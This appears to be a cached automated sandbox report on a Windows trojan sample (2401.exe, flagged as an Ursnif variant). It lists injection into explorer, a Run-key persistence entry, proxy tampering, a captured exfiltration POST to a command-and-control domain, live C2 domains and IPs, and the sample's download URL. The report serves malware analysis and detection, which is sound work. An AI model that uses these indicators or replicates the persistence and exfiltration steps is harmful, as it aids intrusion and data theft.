(cache) Free Automated Malware Analysis Service

16c624 (cache) Free Automated Malware Analysis Service - powered by VxStream Sandbox

Attention: please enable javascript in order to properly view and use this malware analysis service.

malicious

Threat Score: 100/100 AV Multiscan: 7% virus.win32.sality

2401.exe

Analyzed on January 25th 2017 08:47:49 (CEST) running the Kernelmode monitor and action script Heavy Anti-Evasion
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by VxStream Sandbox v5.60 © Payload Security

Incident Response

Risk Assessment

Remote Access: Uses network protocols on unusual ports
Spyware: POSTs files to a webserver
Credential Stealer: Scans for artifacts that may help identify the target
Touched instant messenger related registry keys
Persistence: Injects into explorer
Injects into remote processes
Modifies auto-execute functionality by setting/creating a value in the registry
Fingerprint: Reads the active computer name
Reads the cryptographic machine GUID
Scans for artifacts that may help identify the target
Spreading: Opens the MountPointManager (often used to detect additional infection locations)
Network Behavior: Contacts 4 domains and 3 hosts. View the network section for more details.

Platform Intelligence

Submission Context

Associated URLs: http://www.cp4.de/cp4/2401.exe

Indicators

Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.

Malicious Indicators 8
External Systems
- Detected Emerging Threats Alert
  
  details
  
  Detected alert "ET TROJAN Ursnif Variant CnC Data Exfil" (SID: 2021830, Rev: 3, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
  
  source
  
  Suricata Alerts
  
  relevance
  
  10/10
- Sample was identified as malicious by at least one Antivirus engine
  
  details
  
  4/57 Antivirus vendors marked sample as malicious (7% detection rate)
  
  source
  
  External System
  
  relevance
  
  8/10
Installation/Persistance
- Injects into explorer
  
  details
  
  Injected into "explorer.exe" (UID: 00035029-00001948)
  
  source
  
  Monitored Target
  
  relevance
  
  5/10
- Injects into remote processes
  
  details
  
  Injected into "explorer.exe" at 2017-1-25.02:44:00.330 (UID: 00035029-00001948)
  
  source
  
  Monitored Target
  
  relevance
  
  6/10
Spyware/Information Retrieval
- Scans for artifacts that may help identify the target
  
  details
  
  "explorer.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS LIVE MAIL")
  "explorer.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\15.0\OUTLOOK\PROFILES\OUTLOOK\")
  "explorer.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\16.0\OUTLOOK\PROFILES\OUTLOOK\")
  
  source
  
  Registry Access
  
  relevance
  
  3/10
- Touched instant messenger related registry keys
  
  details
  
  "explorer.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS LIVE MAIL")
  
  source
  
  Registry Access
  
  relevance
  
  5/10
Hiding 2 Malicious Indicators
- All indicators are available only in the private webservice or standalone version

Suspicious Indicators 25
Anti-Detection/Stealthyness
- Queries process information
  
  details
  
  "adprtext.exe" queried SystemProcessInformation at 00027338-00003252-00000105-79664315
  
  source
  
  API Call
  
  relevance
  
  4/10
- Queries the internet cache settings (often used to hide footprints in index.dat or internet cache)
  
  details
  
  "explorer.exe" (Access type: "QUERYVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "DISABLECACHINGOFSSLPAGES"; Value: "00000000040000000400000000000000")
  
  source
  
  Registry Access
  
  relevance
  
  3/10
- Sets the process error mode to suppress error box
  
  details
  
  "<Input Sample>" set its error mode to SEM_NOOPENFILEERRORBOX
  "adprtext.exe" set its error mode to SEM_NOOPENFILEERRORBOX
  
  source
  
  API Call
  
  relevance
  
  8/10
Anti-Reverse Engineering
- PE file has unusual entropy sections
  
  details
  
  .rsrc with unusual entropies 7.79862553693
  
  source
  
  Static Parser
  
  relevance
  
  10/10
Environment Awareness
- Reads the active computer name
  
  details
  
  "<Input Sample>" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
  "adprtext.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
  
  source
  
  Registry Access
  
  relevance
  
  5/10
- Reads the cryptographic machine GUID
  
  details
  
  "explorer.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
  
  source
  
  Registry Access
  
  relevance
  
  10/10
General
- Contains ability to find and load resources of a specific module
  
  details
  
  FindResourceExW@KERNEL32.DLL at PID 00002356 (Show Stream)
  FindResourceExW@KERNEL32.DLL at PID 00002356 (Show Stream)
  FindResourceExW@KERNEL32.DLL at PID 00003252 (Show Stream)
  FindResourceExW@KERNEL32.DLL at PID 00003252 (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  1/10
- POSTs files to a webserver
  
  details
  
  "POST /images/T5bBOV8l85Qk1/m8Wl9syM/yPg5RYaxlJ8t4CrLMAkdkSy/b0JDQA4Xqq/1aYEyJL_2Fnsujt5c/5mv7Me0nN3_2/BvKyV5_2Bqg/bp9V0946G0tkea/Htr779_2FUYQgiM_2FgOU/pt19z1zdnUczVV5_/2Fyb9bXrj8t/8HEEp3.bmp HTTP/1.1
  Content-Type: multipart/form-data; boundary=397127342909960221985636
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
  Host: kgnene199meiwww.com
  Content-Length: 415
  Connection: Keep-Alive
  Cache-Control: no-cache" with no payload
  
  source
  
  Network Traffic
  
  relevance
  
  5/10
- Reads configuration files
  
  details
  
  "<Input Sample>" read file "%USERPROFILE%\Desktop\desktop.ini"
  "adprtext.exe" read file "%USERPROFILE%\Desktop\desktop.ini"
  
  source
  
  API Call
  
  relevance
  
  4/10
- Sends UDP traffic
  
  details
  
  "UDP connection to 148.163.112.203"
  
  source
  
  Network Traffic
  
  relevance
  
  7/10
Installation/Persistance
- Drops executable files
  
  details
  
  "adprtext.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
  
  source
  
  Extracted File
  
  relevance
  
  10/10
- Modifies auto-execute functionality by setting/creating a value in the registry
  
  details
  
  "<Input Sample>" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN"; Key: "API-GSVC"; Value: "%APPDATA%\cmdisvc6\adprtext.exe")
  
  source
  
  Registry Access
  
  relevance
  
  8/10
Network Related
- Found potential IP address in binary/memory
  
  details
  
  "77.91.144.64"
  
  source
  
  String
  
  relevance
  
  3/10
- Uses a User Agent typical for browsers, although no browser was ever launched
  
  details
  
  Found user agent(s): Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
  
  source
  
  Network Traffic
  
  relevance
  
  10/10
System Destruction
- Marks file for deletion
  
  details
  
  "%APPDATA%\cmdisvc6\adprtext.exe" marked "C:\2401.exe" for deletion
  
  source
  
  API Call
  
  relevance
  
  10/10
- Opens file with deletion access rights
  
  details
  
  "adprtext.exe" opened "C:\2401.exe" with delete access
  
  source
  
  API Call
  
  relevance
  
  7/10
System Security
- Modifies proxy settings
  
  details
  
  "<Input Sample>" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  "<Input Sample>" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  "explorer.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
  "explorer.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
  "explorer.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE")
  
  source
  
  Registry Access
  
  relevance
  
  10/10
- Queries sensitive IE security settings
  
  details
  
  "<Input Sample>" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
  "explorer.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
  
  source
  
  Registry Access
  
  relevance
  
  8/10
Unusual Characteristics
- Imports suspicious APIs
  
  details
  
  LoadLibraryW
  IsDebuggerPresent
  GetModuleFileNameA
  LoadLibraryA
  UnhandledExceptionFilter
  GetCommandLineA
  GetProcAddress
  GetModuleHandleA
  FindResourceExW
  GetStartupInfoA
  GetModuleHandleW
  TerminateProcess
  WriteFile
  Sleep
  GetFileAttributesExA
  CreateFileA
  GetTickCount
  VirtualAlloc
  GetWindowThreadProcessId
  WSASocketA
  bind (Ordinal #2)
  WSAStartup (Ordinal #115)
  socket (Ordinal #23)
  
  source
  
  Static Parser
  
  relevance
  
  1/10
- Installs hooks/patches the running process
  
  details
  
  "<Input Sample>" wrote bytes "4053077758580877186a0877653c09770000000000bfd5760000000056ccd576000000007ccad57600000000376833756a2c0977d62d097700000000206933750000000029a6d57600000000a48d337500000000f70ed57600000000" to virtual address "0x759A1000" (part of module "NSI.DLL")
  "adprtext.exe" wrote bytes "4053077758580877186a0877653c09770000000000bfd5760000000056ccd576000000007ccad57600000000376833756a2c0977d62d097700000000206933750000000029a6d57600000000a48d337500000000f70ed57600000000" to virtual address "0x759A1000" (part of module "NSI.DLL")
  
  source
  
  Hook Detection
  
  relevance
  
  10/10
- Reads information about supported languages
  
  details
  
  "cmd.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
  
  source
  
  Registry Access
  
  relevance
  
  3/10
Hiding 4 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version

Informative 16
Anti-Reverse Engineering
- Contains ability to register a top-level exception handler (often used as anti-debugging trick)
  
  details
  
  SetUnhandledExceptionFilter@KERNEL32.dll at 14945-698-00411678
  SetUnhandledExceptionFilter@KERNEL32.dll at 14945-1204-0040B04F
  SetUnhandledExceptionFilter@KERNEL32.DLL at PID 00002356 (Show Stream)
  SetUnhandledExceptionFilter@KERNEL32.DLL at PID 00002356 (Show Stream)
  SetUnhandledExceptionFilter@KERNEL32.DLL at PID 00002356 (Show Stream)
  SetUnhandledExceptionFilter@KERNEL32.DLL at PID 00002356 (Show Stream)
  SetUnhandledExceptionFilter@KERNEL32.DLL at PID 00003252 (Show Stream)
  SetUnhandledExceptionFilter@KERNEL32.DLL at PID 00003252 (Show Stream)
  SetUnhandledExceptionFilter@KERNEL32.DLL at PID 00003252 (Show Stream)
  SetUnhandledExceptionFilter@KERNEL32.DLL at PID 00003252 (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  1/10
Environment Awareness
- Contains ability to query machine time
  
  details
  
  GetSystemTimeAsFileTime@KERNEL32.DLL at PID 00002356 (Show Stream)
  GetSystemTime@KERNEL32.DLL at PID 00002356 (Show Stream)
  GetSystemTime@KERNEL32.DLL at PID 00002356 (Show Stream)
  GetSystemTime@KERNEL32.DLL at PID 00003252 (Show Stream)
  GetSystemTimeAsFileTime@KERNEL32.DLL at PID 00003252 (Show Stream)
  GetSystemTime@KERNEL32.DLL at PID 00003252 (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  1/10
- Possibly tries to detect the presence of a debugger
  
  details
  
  GetProcessHeap@KERNEL32.DLL at PID 00002356 (Show Stream)
  GetProcessHeap@KERNEL32.DLL at PID 00003252 (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  1/10
General
- Contacts domains
  
  details
  
  "grohotibombivasebut45.com"
  "iwdiwjdiwjdwdwd198.com"
  "rodnenekieh120.com"
  "kgnene199meiwww.com"
  
  source
  
  Network Traffic
  
  relevance
  
  1/10
- Contacts server
  
  details
  
  "148.163.112.203:31780"
  "77.91.144.64:80"
  "148.163.112.203:22045"
  
  source
  
  Network Traffic
  
  relevance
  
  1/10
- Contains PDB pathways
  
  details
  
  "C:\Ensoniq\pots\Infrastructures\TB.pdb"
  
  source
  
  String
  
  relevance
  
  1/10
- Creates a writable file in a temporary directory
  
  details
  
  "<Input Sample>" created file "%TEMP%\2EC6\28E3.bat"
  "explorer.exe" created file "%TEMP%\9087.bin"
  
  source
  
  API Call
  
  relevance
  
  1/10
- Creates mutants
  
  details
  
  "\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
  "\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
  "\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
  "\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
  "\Sessions\1\BaseNamedObjects\{077BCAD4-BAFC-D1E4-FC2B-8E95F08FA299}"
  "\Sessions\1\BaseNamedObjects\IESQMMUTEX_0_208"
  "\Sessions\1\BaseNamedObjects\Local\{4711FF31-FA1D-1115-3C6B-CED530CFE2D9}"
  "\Sessions\1\BaseNamedObjects\Local\{B92517C0-C493-538C-96FD-38372A81EC5B}"
  "\Sessions\1\BaseNamedObjects\Local\{1F360C78-F20C-A907-F4C3-46ED68A7DA71}"
  "\Sessions\1\BaseNamedObjects\Local\_!MSFTHISTORY!_"
  "\Sessions\1\BaseNamedObjects\Local\c:!users!pspubws!appdata!local!microsoft!windows!temporary internet files!content.ie5!"
  "\Sessions\1\BaseNamedObjects\Local\c:!users!pspubws!appdata!roaming!microsoft!windows!cookies!"
  "\Sessions\1\BaseNamedObjects\Local\c:!users!pspubws!appdata!local!microsoft!windows!history!history.ie5!"
  "\Sessions\1\BaseNamedObjects\Local\WininetStartupMutex"
  "\Sessions\1\BaseNamedObjects\Local\WininetConnectionMutex"
  "\Sessions\1\BaseNamedObjects\Local\WininetProxyRegistryMutex"
  "\Sessions\1\BaseNamedObjects\RasPbFile"
  "\Sessions\1\BaseNamedObjects\Local\!IETld!Mutex"
  
  source
  
  Created Mutant
  
  relevance
  
  3/10
- Runs shell commands
  
  details
  
  "cmd /c ""%APPDATA%\cmdisvc6\adprtext.exe" "C:\2401.exe""" on 2017-1-25.01:28:00.660
  "cmd /C ""%APPDATA%\cmdisvc6\adprtext.exe" "C:\2401.exe""" on 2017-1-25.01:28:00.881
  
  source
  
  Monitored Target
  
  relevance
  
  5/10
- Scanning for window names
  
  details
  
  "<Input Sample>" searching for class "ProgMan"
  "adprtext.exe" searching for class "ProgMan"
  
  source
  
  API Call
  
  relevance
  
  10/10
- Spawns new processes
  
  details
  
  Spawned process "cmd.exe" with commandline "cmd /c ""%APPDATA%\cmdisvc6\adprtext.exe" "C:\2401.exe""" (UID: 00027312-00003132)
  Spawned process "cmd.exe" with commandline "cmd /C ""%APPDATA%\cmdisvc6\adprtext.exe" "C:\2401.exe""" (UID: 00027335-00003244)
  Spawned process "adprtext.exe" with commandline ""C:\2401.exe"" (UID: 00027338-00003252)
  
  source
  
  Monitored Target
  
  relevance
  
  3/10
Installation/Persistance
- Connects to LPC ports
  
  details
  
  "<Input Sample>" connecting to "\ThemeApiPort"
  "adprtext.exe" connecting to "\ThemeApiPort"
  
  source
  
  API Call
  
  relevance
  
  1/10
- Dropped files
  
  details
  
  "adprtext.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
  "9087.bin" has type "Zip archive data at least v2.0 to extract"
  "01D276F955CEADB00B" has type "Little-endian UTF-16 Unicode text with CRLF CR line terminators"
  "28E3.bat" has type "ASCII text with CRLF line terminators"
  "prefs.js" has type "ASCII text with very long lines with CRLF line terminators"
  "B896.bin" has type "Zip archive data (empty)"
  
  source
  
  Extracted File
  
  relevance
  
  3/10
- Touches files in the Windows directory
  
  details
  
  "<Input Sample>" touched file "%WINDIR%\system32\en-US\MSVFW32.dll.mui"
  "<Input Sample>" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
  "<Input Sample>" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
  "<Input Sample>" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
  "<Input Sample>" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db"
  "<Input Sample>" touched file "%WINDIR%\system32\c_1252.nls"
  "adprtext.exe" touched file "%WINDIR%\system32\en-US\MSVFW32.dll.mui"
  "adprtext.exe" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
  "adprtext.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
  "adprtext.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
  "adprtext.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db"
  "adprtext.exe" touched file "%WINDIR%\system32\c_1252.nls"
  "adprtext.exe" touched file "%WINDIR%\SYSTEM32\ntdll.dll"
  "explorer.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files"
  
  source
  
  API Call
  
  relevance
  
  7/10
Network Related
- Found potential URL in binary/memory
  
  details
  
  Heuristic match: "Font.Name"
  Heuristic match: "CaptionFont.Name"
  
  source
  
  String
  
  relevance
  
  10/10
System Security
- Opens the Kernel Security Device Driver (KsecDD) of Windows
  
  details
  
  "<Input Sample>" opened "\Device\KsecDD"
  "adprtext.exe" opened "\Device\KsecDD"
  
  source
  
  API Call
  
  relevance
  
  10/10

File Details

All Details:

2401.exe

Filename: 2401.exe
Size: 649KiB (664576 bytes)
Type: PE32 executable (GUI) Intel 80386, for MS Windows
Architecture
: 32 Bit
SHA256
: f220a966aaffb0bab4956c35d392564993e310211c3b7b9e9834910258dea3da
MD5
: b448453b7f2d7758c6e2b6c0a22b0c6c
SHA1
: a186034886f6b1c2dd837289ead660ba560f518c
SHA512
: 91fe9ec760f52141e45b219d25ed853c47f1acf41d4a12c3cd69b7ff90f751f7ef1f550fc77d38bf546c3f074e1ea36d81d65ce9a63cdc261faef4e7e6728463
ssdeep
: 12288:Ibz6b2EhNyw6QSTPeTiPNLQZ01jcT0x7mYqX3hl8EG9WS115:Ib2b2Evy/1TmTiPNLQi1mciYqh+AU15
imphash
: 1ed30dc542774149d0459d2be68acddc
authentihash
: 3238d324defb21bd10a13f70044bf57a90503527047668b3656c72142819ffa6
Compiler/Packer
: Microsoft Visual C++ 8

Resources

Language
: ENGLISH
Icon

Visualization

Input File (PortEx)

Version Info

LegalCopyright: (C) 2007-2015 Photomix Corporation
InternalName: AvayaliveDrilled
CompanyName: Photomix Corporation
ProductName: AvayaliveDrilled
ProductVersion: 6.7.94.8
FileDescription: Expression Forrest Traceroute Worse Expression Redefine
OriginalFilename: AvayaliveDrilled.exe
Translation: 0x0409 0x04b0

Classification (TrID)

48.1% (.EXE) InstallShield setup
34.9% (.EXE) Win32 Executable MS Visual C++ (generic)
7.3% (.DLL) Win32 Dynamic Link Library (generic)
5.0% (.EXE) Win32 Executable (generic)
2.2% (.EXE) Generic Win/DOS Executable

File Sections

Details	Name	Entropy	Virtual Address	Virtual Size	Raw Size	MD5
Name .text Entropy 6.7240289527 Virtual Address 0x1000 Virtual Size 0x18db4 Raw Size 0x18e00 MD5 03d8afa817933c14c81096fdcc44ed52	.text	6.7240289527	0x1000	0x18db4	0x18e00	03d8afa817933c14c81096fdcc44ed52
Name .rdata Entropy 5.79134435039 Virtual Address 0x1a000 Virtual Size 0x5ed6 Raw Size 0x6000 MD5 d4b1631052b7ea89d1394a568503d049	.rdata	5.79134435039	0x1a000	0x5ed6	0x6000	d4b1631052b7ea89d1394a568503d049
Name .data Entropy 5.32070989866 Virtual Address 0x20000 Virtual Size 0x4954 Raw Size 0x2e00 MD5 706da43947df71506aec0056e74484e0	.data	5.32070989866	0x20000	0x4954	0x2e00	706da43947df71506aec0056e74484e0
Name .rsrc Entropy 7.79862553693 Virtual Address 0x25000 Virtual Size 0x802fc Raw Size 0x80400 MD5 fc4496b1e89f2f649b66ac3bc23c84e6	.rsrc	7.79862553693	0x25000	0x802fc	0x80400	fc4496b1e89f2f649b66ac3bc23c84e6

File Imports

GetServiceKeyNameA

GetSidIdentifierAuthority

GetSidLengthRequired

RegisterTraceGuidsA

AVIStreamGetFrame

AVIStreamGetFrameClose

AVIStreamGetFrameOpen

ImageList_Add

ImageList_Create

ImageList_ReplaceIcon

CryptUIWizImport

CreateSolidBrush

DeleteObject

EndPage

ExcludeClipRect

GetPixel

SelectClipRgn

SelectObject

SelectPalette

StartDocA

StartPage

CloseHandle

CreateFileA

DeleteCriticalSection

EnterCriticalSection

EnumTimeFormatsA

ExitProcess

FileTimeToSystemTime

FindResourceExW

FlushFileBuffers

FreeEnvironmentStringsA

FreeEnvironmentStringsW

GetACP

GetCommandLineA

GetConsoleCP

GetConsoleMode

GetConsoleOutputCP

GetCPInfo

GetCurrentProcess

GetCurrentProcessId

GetCurrentThreadId

GetEnvironmentStrings

GetEnvironmentStringsW

GetFileAttributesExA

GetFileType

GetLastError

GetLocaleInfoA

GetModuleFileNameA

GetModuleHandleA

GetModuleHandleW

GetOEMCP

GetProcAddress

GetProcessHeap

GetStartupInfoA

GetStdHandle

GetStringTypeA

GetStringTypeW

GetSystemTime

GetSystemTimeAsFileTime

GetTickCount

HeapAlloc

HeapCreate

HeapFree

HeapReAlloc

HeapSize

InitializeCriticalSectionAndSpinCount

InterlockedDecrement

InterlockedIncrement

IsDebuggerPresent

IsValidCodePage

LCMapStringA

LCMapStringW

LeaveCriticalSection

LoadLibraryA

LoadLibraryW

LoadResource

MulDiv

MultiByteToWideChar

QueryPerformanceCounter

RaiseException

ReadFile

RtlUnwind

SetEndOfFile

SetFilePointer

SetHandleCount

SetLastError

SetStdHandle

SetUnhandledExceptionFilter

Sleep

TerminateProcess

TlsAlloc

TlsFree

TlsGetValue

TlsSetValue

UnhandledExceptionFilter

VirtualAlloc

VirtualFree

WideCharToMultiByte

WriteConsoleA

WriteConsoleW

WriteFile

CoGetClassObject

CoInitialize

CoLockObjectExternal

IIDFromString

QueryPathOfRegTypeLib (Ordinal #164)

SysFreeString (Ordinal #6)

SHGetFileInfoA

AppendMenuA

BeginPaint

CheckMenuItem

ClientToScreen

CopyIcon

CountClipboardFormats

CreateWindowExA

DeleteMenu

DestroyWindow

DrawIcon

DrawIconEx

EnumDisplayDevicesA

FillRect

GetClientRect

GetCursorInfo

GetCursorPos

GetDC

GetDlgItem

GetMenuItemCount

GetMenuItemID

GetMenuItemInfoA

GetParent

GetPriorityClipboardFormat

GetSubMenu

GetSystemMenu

GetSystemMetrics

GetWindowLongA

GetWindowPlacement

GetWindowRect

GetWindowThreadProcessId

InsertMenuA

InvalidateRect

IsWindow

LoadAcceleratorsA

LoadBitmapA

LoadMenuA

MessageBoxA

OffsetRect

OpenClipboard

PostQuitMessage

SendDlgItemMessageA

SendMessageA

SetClipboardViewer

SetMenuItemBitmaps

SetTimer

SetWindowLongA

SetWindowPlacement

SetWindowPos

ShowWindow

UpdateWindow

WindowFromPoint

ScriptApplyDigitSubstitution

ScriptApplyLogicalWidth

WinHttpSetTimeouts

WinHttpTimeFromSystemTime

bind (Ordinal #2)

gethostbyname (Ordinal #52)

gethostname (Ordinal #57)

htons (Ordinal #9)

socket (Ordinal #23)

WSAIoctl

WSASocketA

WSAStartup (Ordinal #115)

Screenshots

Loading content, please wait...

Hybrid Analysis

Tip: Click an analysed process below to view more details.

Analysed 5 processes in total (System Resource Monitor).

2401.exe (PID: 2356)
- cmd.exe cmd /c ""%APPDATA%\cmdisvc6\adprtext.exe" "C:\2401.exe"" (PID: 3132)
  - cmd.exe cmd /C ""%APPDATA%\cmdisvc6\adprtext.exe" "C:\2401.exe"" (PID: 3244)
    - adprtext.exe "C:\2401.exe" (PID: 3252)
      - explorer.exe %WINDIR%\Explorer.EXE (PID: 1948)

Reduced Monitoring

Logged Script Calls

Extracted Streams

Memory Dumps

Network Activity

Network Analysis

DNS Requests

Download DNS Requests (CSV)

Domain	Address	Country
grohotibombivasebut45.com	-	-
iwdiwjdiwjdwdwd198.com	-	-
rodnenekieh120.com	-	-
kgnene199meiwww.com	77.91.144.64	Ukraine

Contacted Hosts

Download Contacted Hosts (CSV)

IP Address

Port/Protocol

Associated Process

Details

148.163.112.203
OSINT

Associated Artifacts for 148.163.112.203

Details	Associated URL	Threat Level	Positives	Scan Date	VirusTotal
Associated URL http://148.163.112.203/ Threat Level suspicious Positives 1/68 Scan Date 01/19/2017 09:12:27 VirusTotal -	http://148.163.112.203/	suspicious	1/68	01/19/2017 09:12:27	-

31780
UDP

explorer.exe
PID: 1948

United States
ASN: 53755 (Input Output Flood LLC)

77.91.144.64
OSINT

Associated Artifacts for 77.91.144.64

Details	Associated URL	Threat Level	Positives	Scan Date	VirusTotal
Associated URL http://77.91.144.64/ Threat Level suspicious Positives 1/64 Scan Date 01/25/2017 03:08:29 VirusTotal -	http://77.91.144.64/	suspicious	1/64	01/25/2017 03:08:29	-
Associated URL http://usetheanygrantsentire.ru/images/kNiInWV_2FX/Dd1ZH4cJgv3qNw/Bz4esNlaeex9E9aLdwIBl/jZAlNE_2FTz_2FIH/fh7cSLpb13Mo6Mu/U27iBSEWnxcgzgspzD/5Uq7D4czf/9DOrMp0M_2BY774drGd2/xf_2BZjpG24_2BP6cgr/MSBnwwIRaAulrnoEbFTb_2/FahhtYxnN56Wc/JUnHnjAS/7lt_2B4P0VnORSfKG5Z/zG2.gif Threat Level suspicious Positives 1/68 Scan Date 11/01/2016 21:42:50 VirusTotal -	http://usetheanygrantsentire.ru/images/kNiInWV_2FX/Dd1ZH4cJgv3qNw/Bz4esNlaeex9E9aLdwIBl/jZAlNE_2FTz_2FIH/fh7cSLpb13Mo6Mu/U27iBSEWnxcgzgspzD/5Uq7D4czf/9DOrMp0M_2BY774drGd2/xf_2BZjpG24_2BP6cgr/MSBnwwIRaAulrnoEbFTb_2/FahhtYxnN56Wc/JUnHnjAS/7lt_2B4P0VnORSfKG5Z/zG2.gif	suspicious	1/68	11/01/2016 21:42:50	-
Associated URL http://usetheanygrantsentire.ru/images/PQh8ILzvgJDZkI09IwBW/UvYy7r_2F05c0_2FXdZ/x8TQ2CGVPoLYAriLsz50Ir/X_2BmIGqvDK9x/HA8cxBTV/rQ3E5kn9HCRNx4871F38UqE/NxtTFmjoAX/U4AswtLUliRH0RaH3/G7Cm_2BOK77w/SgTHZv7hqKS/9KBWLtRL4yomMr/mw84QsvNHKZ7mwdqmorWN/PckSJYRm/LB.gif Threat Level suspicious Positives 1/68 Scan Date 11/01/2016 21:42:33 VirusTotal -	http://usetheanygrantsentire.ru/images/PQh8ILzvgJDZkI09IwBW/UvYy7r_2F05c0_2FXdZ/x8TQ2CGVPoLYAriLsz50Ir/X_2BmIGqvDK9x/HA8cxBTV/rQ3E5kn9HCRNx4871F38UqE/NxtTFmjoAX/U4AswtLUliRH0RaH3/G7Cm_2BOK77w/SgTHZv7hqKS/9KBWLtRL4yomMr/mw84QsvNHKZ7mwdqmorWN/PckSJYRm/LB.gif	suspicious	1/68	11/01/2016 21:42:33	-
Associated URL http://usetheanygrantsentire.ru/images/reTwLuNjXI8TPub/FS_2Bnbc5RUziwpEEm/ZG2_2Bo_2/B97kk_2FDSAzf31Ow5Nk/7dTAAU0UXBOHMV_2Fc_/2FlMTcTr_2Bcwm_2BTcBqO/_2FTSHn4ag1ob/YSek8vpf/sJ4CLpA9bI3qSzBXdXkC5wA/8aNSQi1BU5/5u7ZV9imdu1dIoEpk/9MKEphumHNwb/SGDtqzsusJ4/CUMcNZrrLI_2/Ffj.gif Threat Level suspicious Positives 1/68 Scan Date 11/01/2016 21:42:33 VirusTotal -	http://usetheanygrantsentire.ru/images/reTwLuNjXI8TPub/FS_2Bnbc5RUziwpEEm/ZG2_2Bo_2/B97kk_2FDSAzf31Ow5Nk/7dTAAU0UXBOHMV_2Fc_/2FlMTcTr_2Bcwm_2BTcBqO/_2FTSHn4ag1ob/YSek8vpf/sJ4CLpA9bI3qSzBXdXkC5wA/8aNSQi1BU5/5u7ZV9imdu1dIoEpk/9MKEphumHNwb/SGDtqzsusJ4/CUMcNZrrLI_2/Ffj.gif	suspicious	1/68	11/01/2016 21:42:33	-
Associated URL http://usetheanygrantsentire.ru/images/IeuOvYTj1WyLt0BtAzl/vKrqpRgKqvCE34AzcHf_2B/_2FxECsUAW6Tr/Ad9K9KOp/KeL8jc6L0L4h1pP_2B72HLp/AhUwuGDptP/LQCs_2FIyl3_2Bhq6/lxgFYMl7wd0b/94lQUdVFbpg/t56wwbU5e5_2FZ/jy0UUlCpJ4vM_2F7BkLBk/WMx1JReV7ldQB6LW/IZoE_2BRM4ORwkfmkC2WE/o.gif Threat Level suspicious Positives 1/68 Scan Date 11/01/2016 21:42:27 VirusTotal -	http://usetheanygrantsentire.ru/images/IeuOvYTj1WyLt0BtAzl/vKrqpRgKqvCE34AzcHf_2B/_2FxECsUAW6Tr/Ad9K9KOp/KeL8jc6L0L4h1pP_2B72HLp/AhUwuGDptP/LQCs_2FIyl3_2Bhq6/lxgFYMl7wd0b/94lQUdVFbpg/t56wwbU5e5_2FZ/jy0UUlCpJ4vM_2F7BkLBk/WMx1JReV7ldQB6LW/IZoE_2BRM4ORwkfmkC2WE/o.gif	suspicious	1/68	11/01/2016 21:42:27	-

Details	Domain	Threat Level	Positives	Last Resolved	VirusTotal
